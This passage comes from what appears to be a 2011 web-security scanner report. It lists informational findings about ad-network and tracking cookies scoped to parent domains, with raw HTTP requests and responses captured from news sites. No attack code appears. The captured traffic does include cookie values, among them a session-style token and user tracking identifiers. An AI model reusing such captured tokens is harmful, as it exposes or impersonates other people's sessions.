KXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; 
pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15097%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 13:59:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4369754592172087684&fpid=4&nu=n&t=
...[SNIP]...

9.79. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 14:00:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.884214.743832.0XMC
Set-Cookie: F1=Bg28H3kAAAAAYm1CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: ROLL=boAno2CkdKAgj1G!; domain=advertising.com; expires=Wed, 08-May-2013 14:00:08 GMT; path=/
Set-Cookie: 29047542=_4dc7f368,4264037248,743832^884214^81^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 14:00:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000743832/m
...[SNIP]...

9.80. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=5068520 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=05a5761a-b8e3-4fc1-b933-f9f7eb10c6b9; lgtix=HAACALsA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: lgpr=//8=; path=/; expires=Tue, 10 May 2011 13:59:50 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQABAL0AHAACALsA; path=/; expires=Sat, 01-Jan-2050 23:59:59 GMT; domain=.legolas-media.com
Content-Length: 0
Connection: close


9.81. http://services.krxd.net/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.krxd.net
Path:   /pixel.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.gif?_kcp_d=nme.com&_kpid=3efee9db-7d85-4533-9e41-c635ebf2d937&_kcp_s=NME&_kcp_sc=News&_kcp_ssc=news&_kua_loggedIn=no&_kpa_pageTitle=Sufjan%20Stevens%20suffered%20%26%23039%3Bbreakdown%26%23039%3B%20while%20watching%20%26%23039%3BFantastic%20Mr%20Fox%26%23039%3B%20%7C%20News%20%7C%20NME.COM&_kpa_contentId=none&_knifr=14&_kpix_0=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4705&_kpix_1=http%3A%2F%2Fwww.burstbeacon.com%2Fview%2F103170%2F64948%2F182030%2F318088%2F3050%2F2D1A28EF%2F&_kpix_2=http%3A%2F%2Fwww.burstnet.com%2Fenlightn%2F7578%2F%2F12A4%2F&_kpix_3=http%3A%2F%2Fb.scorecardresearch.com%2Fb%3FC1%3D8%26C2%3D6035047%26C3%3D201.2%26C4%3Dad20731a%26C5%3D182030%26C6%3D0%26C7%3Dhttp%253A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527%26C8%3DSufjan%2520Stevens%2520suffered%2520%2527breakdown%2527%2520while%2520watching%2520%2527Fantastic%2520Mr%2520Fox%2527%2520%257C%2520News%2520%257C%2520NME.COM%26C9%3D%26C10%3D1920x1200%26rn%3D46905169&_kpix_4=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_5=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_6=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_7=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_8=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-e4m3Yko6bFYVc.gif%3Flabels%3DMusic%2CEntertainment&_kpix_9=http%3A%2F%2Ftrgca.opt.fimserve.com%2Ffp.gif%3Fpixelid%3D287-036699%26diresu%3D154dab7990adc1d6f3372c12&_kpix_10=http%3A%2F%2Faka-cdn-ns.adtech.de%2Fimages%2F175%2FAd2832047St1Sz16Sq3827014V1Id5.gif HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Mon, 09 May 2011 14:07:03 GMT
Last-Modified: Tue, 14 Dec 2010 00:06:17 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: _kuid_=10.83.71.216.1304950023530725; path=/; expires=Sat, 05-Nov-11 14:07:03 GMT; domain=.krxd.net
X-Request-Time: D=102 t=1304950023530639
X-Served-By: logger005.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

9.82. http://sitelife.floridatoday.com/ver1.0/daapi2.api

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.floridatoday.com
Path:   /ver1.0/daapi2.api

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:00:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=34faabe1-935e-4483-8538-ddb5398c32aa; domain=floridatoday.com; expires=Tue, 08-May-2012 14:00:40 GMT; path=/
Date: Mon, 09 May 2011 14:00:39 GMT
Content-Length: 3035

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...

9.83. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304791878

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7850 30800
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304949607; domain=.mathtag.com; path=/; expires=Tue, 08-May-2012 14:00:07 GMT
Content-Length: 0


9.84. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:46 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 20:00:46 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);

9.85. http://t.invitemedia.com/track_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=64&campID=60443&crID=86537&auctionID=13049496061384085-86537&cost=2.1000&pubICode=2250555&pub=321582&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ 